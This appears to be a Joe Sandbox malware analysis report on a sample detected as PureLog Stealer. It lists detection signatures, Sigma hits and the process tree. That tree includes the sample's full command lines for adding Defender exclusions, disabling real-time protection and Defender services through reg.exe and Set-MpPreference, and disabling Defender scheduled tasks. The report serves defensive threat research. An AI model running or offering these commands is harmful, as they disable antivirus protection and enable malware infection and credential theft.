Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JWQgbclQK5

Overview

General Information

Sample name:JWQgbclQK5
renamed because original name is a hash value
Original sample name:148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Analysis ID:1417308
MD5:41bf2693033eaed432dfa5c1d75cdeec
SHA1:ff038cb9e992a518106c80868176785e987c301d
SHA256:148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Modifies Windows Defender protection settings
Query firmware table information (likely to detect VMs)
Sigma detected: Disable Important Scheduled Task
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Msiexec Initiated Connection
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious MsiExec Embedding Parent
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64_ra
  • JWQgbclQK5.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\JWQgbclQK5.exe" MD5: 41BF2693033EAED432DFA5C1D75CDEEC)
    • Install_YTTCHTs.exe (PID: 6492 cmdline: .\Install_YTTCHTs.exe MD5: 70C2C0BDD31AB9C6DFB9739B81E67306)
      • msiexec.exe (PID: 6876 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1711662176 " ALLUSERS="1" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 3924 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6192 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E0A36685E052AA6AB614A5D414986D64 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7068 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 5152 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\progressgood.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 2676 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4252 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6800 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 812 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5316 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3860 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5208 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6736 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 716 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5288 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1164 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1344 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 2664 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1948 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5508 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5232 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3068 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3636 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1092 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3724 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5760 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4368 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3484 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4912 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4060 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5136 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4572 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 2672 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 2760 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5488 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 408 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3292 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4004 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3528 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1176 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 2424 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4956 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6924 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4152 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3344 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4836 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5796 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5732 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6920 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 7128 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 676 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5504 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 5320 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 7148 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4336 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4104 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6800 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 2076 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3916 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6056 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 716 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6480 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 4048 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 3228 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1640 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1468 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1776 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6860 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6856 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1992 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6872 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6040 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 1416 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 788 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 2816 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6592 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • PING.EXE (PID: 6244 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • timeout.exe (PID: 3956 cmdline: timeout /t 10 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • powershell.exe (PID: 3168 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss558E.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi557B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr557C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr557D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3992 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5A985AC032B9C93F6690101D7D0915B7 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI551D.tmp (PID: 6396 cmdline: "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe" MD5: 8D49691D4AB2FA3CD8C679C0DF30C1A1)
      • winserverupd.exe (PID: 6228 cmdline: "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe" MD5: 2C7CF1309E31C60D8BB7D71D1415C12A)
        • winserverupd.exe (PID: 2412 cmdline: "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe" MD5: 2C7CF1309E31C60D8BB7D71D1415C12A)
          • cmd.exe (PID: 1488 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 396 cmdline: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4684 cmdline: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2240 cmdline: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4368 cmdline: powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 6824 cmdline: powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • reg.exe (PID: 2676 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 1608 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 3048 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 2144 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 4660 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 1172 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 2528 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 4808 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 5000 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 3012 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 6740 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 5156 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 5084 cmdline: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 7072 cmdline: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 1436 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 456 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 2292 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 6480 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • reg.exe (PID: 3224 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • powershell.exe (PID: 1640 cmdline: powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4180 cmdline: powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7160 cmdline: powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2628 cmdline: powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2212 cmdline: powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 1920 cmdline: powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 6448 cmdline: powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 3368 cmdline: powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4348 cmdline: powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 6264 cmdline: powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2028 cmdline: powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 3432 cmdline: powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • schtasks.exe (PID: 4584 cmdline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4028 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1268 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2012 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6672 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • MSIBF81.tmp (PID: 6156 cmdline: "C:\Windows\Installer\MSIBF81.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe" MD5: 8D49691D4AB2FA3CD8C679C0DF30C1A1)
    • MSIBF92.tmp (PID: 6136 cmdline: "C:\Windows\Installer\MSIBF92.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe" MD5: 8D49691D4AB2FA3CD8C679C0DF30C1A1)
    • MSIBFC2.tmp (PID: 4404 cmdline: "C:\Windows\Installer\MSIBFC2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe" MD5: CE5552C3B309A5F507B31C0AF0C0CABF)
      • EdUpdMachine.exe (PID: 5132 cmdline: "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe" MD5: 2F2B25EF8E4A739A8D4F34031620E705)
  • SurrogateServerIntoSvc.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe" MD5: 4E1C6F4BDF64FFFA6BD810AD68B717EC)
  • cleanup
SourceRuleDescriptionAuthorStrings
00000037.00000002.1817217674.0000000004DC3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000037.00000002.1817217674.0000000004B32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000037.00000002.1926718399.0000000006FF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000037.00000002.1802305485.0000000003035000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000037.00000002.1951876750.0000000007470000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 9 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, ProcessId: 4584, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force", CommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force", ProcessId: 396, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force", CommandLine: powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force", ProcessId: 6448, ProcessName: powershell.exe
